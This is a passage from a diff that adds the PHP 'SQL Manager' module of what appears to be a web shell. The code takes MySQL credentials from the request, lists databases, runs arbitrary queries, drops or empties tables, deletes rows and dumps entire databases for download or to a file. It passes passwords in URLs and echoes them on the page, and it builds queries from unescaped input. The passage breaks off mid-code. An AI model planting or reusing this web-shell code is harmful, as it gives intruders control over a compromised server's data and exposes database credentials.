+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
+       echo "<td>".$row["Update_time"]."</td>"; 
+       echo "<td>".$size."</td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; 
+       echo "</tr>"; 
+       $i++; 
+      } 
+      echo "<tr bgcolor=\"000000\">"; 
+      echo "<td><center><b>»</b></center></td>"; 
+      echo "<td><center><b>".$i." table(s)</b></center></td>"; 
+      echo "<td><b>".$trows."</b></td>"; 
+      echo "<td>".$row[1]."</td>"; 
+      echo "<td>".$row[10]."</td>"; 
+      echo "<td>".$row[11]."</td>"; 
+      echo "<td><b>".view_size($tsize)."</b></td>"; 
+      echo "<td></td>"; 
+      echo "</tr>"; 
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"tbldrop\">Drop</option>"; 
+      echo "<option value=\"tblempty\">Empty</option>"; 
+      echo "<option value=\"tbldump\">Dump</option>"; 
